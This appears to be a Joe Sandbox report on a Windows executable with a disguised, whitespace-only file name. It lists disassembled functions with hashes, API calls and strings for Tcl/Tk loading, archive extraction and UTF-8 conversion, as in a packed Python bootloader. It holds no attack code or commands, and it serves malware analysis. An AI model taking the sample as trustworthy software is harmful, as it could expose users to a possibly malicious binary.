Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorLast
String ID:
API String ID: 2050971199-0
Opcode ID: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
Instruction ID: 600fa20a7590d8b02730ab9bc315f616e5308f9493c3d49dbd61eb77a757a501
Opcode Fuzzy Hash: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
Instruction Fuzzy Hash: A9414876B14A5891FF14FF2AD9261A9F3A1B748FD0B889036DE0D87B58DE3DD0429310

Function 00007FF73AE27C98 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
Instruction ID: 382156c8b9ba041cd886f0cb5557cf754758045ccd0f4fce938fdb926d892b59
Opcode Fuzzy Hash: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
Instruction Fuzzy Hash: 8D31F436B49B4252F764FB21A44313DB6E4AB86B90F84427CEA8D53BD6CF3CD002A710

Function 00007FF73AE39E40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
Instruction ID: 54e65fa423399a1fbf7216148e4a17ef2742712694e35ff72a7ae64465fad076
Opcode Fuzzy Hash: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
Instruction Fuzzy Hash: 49F044B9A582559AEBA4BF29B41362977D0E748380B8084BDD58983E14D63CD0509F14

Function 00007FF73AE1C760 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
Instruction ID: 7bf9ec54a0a29cb128d50ed8288feb41188ace26b182a66c4dcd8b8d39521699
Opcode Fuzzy Hash: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
Instruction Fuzzy Hash: 61A00129988926E0F645BB20E85B070A270EB91700B9000B1D10E810A09FADA581A260

Function 00007FF73AE16EF0 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF73AE16F07
GetProcAddress.KERNEL32 ref: 00007FF73AE16F46
GetProcAddress.KERNEL32 ref: 00007FF73AE16F6B
GetProcAddress.KERNEL32 ref: 00007FF73AE16F90
GetProcAddress.KERNEL32 ref: 00007FF73AE16FB8
GetProcAddress.KERNEL32 ref: 00007FF73AE16FE0
GetProcAddress.KERNEL32 ref: 00007FF73AE17008
GetProcAddress.KERNEL32 ref: 00007FF73AE17030
GetProcAddress.KERNEL32 ref: 00007FF73AE17058

Strings

GetProcAddress, xrefs: 00007FF73AE16F20
Tcl_EvalEx, xrefs: 00007FF73AE172F6
Tcl_Alloc, xrefs: 00007FF73AE17346
Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF73AE1729A
Failed to get address for Tcl_SetVar2, xrefs: 00007FF73AE171D2
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF73AE16FF2
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF73AE16F58
Tcl_FindExecutable, xrefs: 00007FF73AE16F61
Tcl_Finalize, xrefs: 00007FF73AE16FAE
Tcl_ConditionWait, xrefs: 00007FF73AE17116
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF73AE17182
Failed to get address for Tcl_GetString, xrefs: 00007FF73AE17222
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF73AE170E2
Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF73AE1715A
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF73AE1701A
Tcl_CreateThread, xrefs: 00007FF73AE17026
Failed to get address for Tcl_GetVar2, xrefs: 00007FF73AE171AA
Tcl_DoOneEvent, xrefs: 00007FF73AE16F86
Tcl_GetObjResult, xrefs: 00007FF73AE172A6
Tcl_MutexUnlock, xrefs: 00007FF73AE1709E
Failed to get address for Tcl_MutexLock, xrefs: 00007FF73AE17092
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF73AE17272
Tcl_Free, xrefs: 00007FF73AE1736E
Failed to get address for Tcl_EvalFile, xrefs: 00007FF73AE172EA
Tcl_GetVar2, xrefs: 00007FF73AE1718E
Tcl_DeleteInterp, xrefs: 00007FF73AE16FFE
Tk_Init, xrefs: 00007FF73AE17396
Failed to get address for Tcl_Alloc, xrefs: 00007FF73AE17362
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF73AE1733A
Tcl_MutexLock, xrefs: 00007FF73AE17076
Tcl_CreateInterp, xrefs: 00007FF73AE16F3C
Tcl_EvalObjv, xrefs: 00007FF73AE1731E
Tcl_NewStringObj, xrefs: 00007FF73AE1722E
Tcl_NewByteArrayObj, xrefs: 00007FF73AE17256
Tcl_FinalizeThread, xrefs: 00007FF73AE16FD6
Failed to get address for Tcl_CreateThread, xrefs: 00007FF73AE17042
Failed to get address for Tcl_ConditionWait, xrefs: 00007FF73AE17132
Tcl_ThreadQueueEvent, xrefs: 00007FF73AE1713E
Tcl_EvalFile, xrefs: 00007FF73AE172CE
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF73AE16F7D
Tcl_ConditionFinalize, xrefs: 00007FF73AE170C6
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF73AE1724A
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF73AE1706A
Failed to get address for Tk_Init, xrefs: 00007FF73AE173B2
Tcl_SetVar2Ex, xrefs: 00007FF73AE1727E
Tcl_GetString, xrefs: 00007FF73AE17206
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF73AE170BA
Tcl_SetVar2, xrefs: 00007FF73AE171B6
Failed to get address for Tcl_Finalize, xrefs: 00007FF73AE16FCA
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF73AE171FA
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF73AE172C2
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF73AE173DA
Tcl_Init, xrefs: 00007FF73AE16F00
Tk_GetNumMainWindows, xrefs: 00007FF73AE173BE
Tcl_ConditionNotify, xrefs: 00007FF73AE170EE
Failed to get address for Tcl_EvalEx, xrefs: 00007FF73AE17312
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF73AE16FA2
Tcl_GetCurrentThread, xrefs: 00007FF73AE1704E
Tcl_ThreadAlert, xrefs: 00007FF73AE17166
Tcl_CreateObjCommand, xrefs: 00007FF73AE171DE
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF73AE1710A
Failed to get address for Tcl_Free, xrefs: 00007FF73AE1738A
Failed to get address for Tcl_Init, xrefs: 00007FF73AE16F19

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-2208601799
Opcode ID: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
Instruction ID: db3112d1f7a0a0780f059c14a0623741fc051af93fee3dacbd78073003d26f6e
Opcode Fuzzy Hash: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
Instruction Fuzzy Hash: 1FE1C86CE89B13B0FA15BB54E8931B4E3A5AF08B40BC459F5C81E062A4EF7DF554F620

Function 00007FF73AE112B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AE12B30: MessageBoxW.USER32 ref: 00007FF73AE12C05

_fread_nolock.LIBCMT ref: 00007FF73AE11499

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF73AE112FE
fseek, xrefs: 00007FF73AE11332
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF73AE114BF
%s%c%s, xrefs: 00007FF73AE113EE
\, xrefs: 00007FF73AE113F5
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF73AE11370
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF73AE1132B
fread, xrefs: 00007FF73AE114C6
malloc, xrefs: 00007FF73AE11377

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Message_fread_nolock
String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
API String ID: 3065259568-2316137593
Opcode ID: 99537fa9c1b008712a7aa3354c2a36c19b824afd4db305bccf9d22aff48769b5
Instruction ID: c16c5e5fb6784f646b56e9f2cfb2b9ef0f02dc195d906eaac218ab1b4ac63e7e
Opcode Fuzzy Hash: 99537fa9c1b008712a7aa3354c2a36c19b824afd4db305bccf9d22aff48769b5
Instruction Fuzzy Hash: E151B329B8869765FA20B711E8536FAE394EF44B84FC040B5EE4E47BC5DE7CE541A310

Function 00007FF73AE123F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF73AE1241B
SelectObject.GDI32 ref: 00007FF73AE12462
DrawTextW.USER32 ref: 00007FF73AE12485
SelectObject.GDI32 ref: 00007FF73AE1249B
ReleaseDC.USER32 ref: 00007FF73AE124AB
MoveWindow.USER32 ref: 00007FF73AE124FB
MoveWindow.USER32 ref: 00007FF73AE1253B
MoveWindow.USER32 ref: 00007FF73AE1258E
MoveWindow.USER32 ref: 00007FF73AE125D6

Strings

P%, xrefs: 00007FF73AE1246F

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction ID: 5251bf1307f87f73931aae4837844afff3497c9a6aad107f961fcbd96d52464d
Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction Fuzzy Hash: 6C510726A147A186E634AF22E4191BAF7A1F798B61F404171EBDF43684DF3CD045DB20

Function 00007FF73AE267A4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE267E7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE26BD4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE26E70

Strings

f, xrefs: 00007FF73AE26909
p, xrefs: 00007FF73AE26911
p, xrefs: 00007FF73AE26899
-, xrefs: 00007FF73AE2687D
:, xrefs: 00007FF73AE269A0

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
Instruction ID: 44509096f290846cdfc946fbb7404af5f5e1fc99fe72d893cb9d35f53ec25a43
Opcode Fuzzy Hash: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
Instruction Fuzzy Hash: CC12E67AE4C14BA6FB20BB14D5572B9F6A1FB80754FD44279E689076C4DF3CE480AB20

Function 00007FF73AE21108 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE21148
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE21510
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE217AF

Strings

f, xrefs: 00007FF73AE21395
p, xrefs: 00007FF73AE21252
p, xrefs: 00007FF73AE211ED
f, xrefs: 00007FF73AE2124A
f, xrefs: 00007FF73AE211E0

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction ID: c3cd34528f20061cf20ca2afaa240f703b516e24d91ef504a2da803e4756ef21
Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction Fuzzy Hash: 5B12B33EE4C14BA6FB24BB14D0576BAF251FB80750FC44079E69A466C4DF7CE680AB20

Function 00007FF73AE115A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF73AE115D3
fseek, xrefs: 00007FF73AE11610
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF73AE116C2
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF73AE11639
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF73AE11609
fread, xrefs: 00007FF73AE116C9
malloc, xrefs: 00007FF73AE11640

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 5c28c44b31565bf2893c1db4d2debdb7d0527840850c2b75d7ab63ec7bd8cdee
Instruction ID: 2231df275e7f28371b89a6c421a494b8ff46f4f09fa558986edc718eecdbbc5a
Opcode Fuzzy Hash: 5c28c44b31565bf2893c1db4d2debdb7d0527840850c2b75d7ab63ec7bd8cdee
Instruction Fuzzy Hash: CF31B429B8865366FE24FB11E8431BAE390EF44BC4FC840B5DE4E07A95EE3DE501A710

Function 00007FF73AE1EB00 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF73AE1EB5D

Part of subcall function 00007FF73AE1FA70: __GetUnwindTryBlock.LIBCMT ref: 00007FF73AE1FAB3
Part of subcall function 00007FF73AE1FA70: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF73AE1FAD8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF73AE1EC35
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF73AE1EE8A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF73AE1EF96

Strings

csm, xrefs: 00007FF73AE1EBDE
csm, xrefs: 00007FF73AE1EB77
csm, xrefs: 00007FF73AE1EC58

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
Instruction ID: 236e7361c6d05501d386233f888405ca04049fa2633f0d7c7c84fdcacae06c67
Opcode Fuzzy Hash: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
Instruction Fuzzy Hash: 9BE1AD7AA4876196FB20BB65D4836BDB7A0FB48788F9001B5EE4D47B95CF38E080D750

Function 00007FF73AE186B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE18747
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE1879E

Strings

Out of memory., xrefs: 00007FF73AE187CF
WideCharToMultiByte, xrefs: 00007FF73AE187E6
Failed to get UTF-8 buffer size., xrefs: 00007FF73AE187DF
win32_utils_to_utf8, xrefs: 00007FF73AE187D6
Failed to encode wchar_t as UTF-8., xrefs: 00007FF73AE187C6

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 880ff2e63ba81a384871d9a2b2c380e34ab45f047a7bf3c31ff76456a7931f4a
Instruction ID: 4e4251f0cc0fca09ff4b336f7ddc64032754068056871f907e3c1e4153f37f1e
Opcode Fuzzy Hash: 880ff2e63ba81a384871d9a2b2c380e34ab45f047a7bf3c31ff76456a7931f4a
Instruction Fuzzy Hash: 5D419036A48A9292F620FF15F84312AF6A1FB84B90FD442B5DA8D87B94DF3CD051E710

Function 00007FF73AE18BF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00007FF73AE139EA), ref: 00007FF73AE18C31

Part of subcall function 00007FF73AE129E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF73AE187F2,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE12A14
Part of subcall function 00007FF73AE129E0: MessageBoxW.USER32 ref: 00007FF73AE12AF0

WideCharToMultiByte.KERNEL32(?,00007FF73AE139EA), ref: 00007FF73AE18CA5

Strings

Out of memory., xrefs: 00007FF73AE18C6B
WideCharToMultiByte, xrefs: 00007FF73AE18C45, 00007FF73AE18CB6
Failed to get UTF-8 buffer size., xrefs: 00007FF73AE18C3E
win32_utils_to_utf8, xrefs: 00007FF73AE18C72
Failed to encode wchar_t as UTF-8., xrefs: 00007FF73AE18CAF

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 3723044601-27947307
Opcode ID: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
Instruction ID: 9f90866b3da9b25f8f2c8ec08ffc8e4c411f01c415b28358d159e3ace75c3846
Opcode Fuzzy Hash: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
Instruction Fuzzy Hash: FA218D3AA49B42A5FB10FF56E843079B361EB84B80FD846B5DA4D43794EF3CE551A310

